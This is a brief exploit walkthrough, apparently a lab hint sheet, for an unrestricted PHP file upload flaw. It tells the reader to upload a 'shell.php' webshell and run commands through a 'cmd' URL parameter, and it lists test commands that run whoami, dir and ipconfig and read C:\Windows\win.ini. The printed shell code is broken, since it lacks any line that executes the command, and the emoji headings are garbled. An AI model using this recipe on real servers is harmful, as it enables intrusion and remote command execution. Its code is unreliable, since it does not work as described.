๐ฏ Vulnerability Info
Type: Unrestricted File Upload
Severity: Critical
๐ก How to Exploit
- No file type validation
- PHP files can be uploaded
- Uploaded files are directly accessible
- Execute uploaded PHP files for RCE
๐งช Simple PHP Webshell
Create a file named shell.php:
<?php
// Simple command shell
if(isset($_GET['cmd'])) {
echo '<pre>';
echo '</pre>';
}
?>
๐ Usage
- Save the code above as shell.php
- Upload the file
- Access:
/uploads/shell.php?cmd=whoami
๐ง Test Commands
shell.php?cmd=whoami
shell.php?cmd=dir
shell.php?cmd=ipconfig
shell.php?cmd=type C:\Windows\win.ini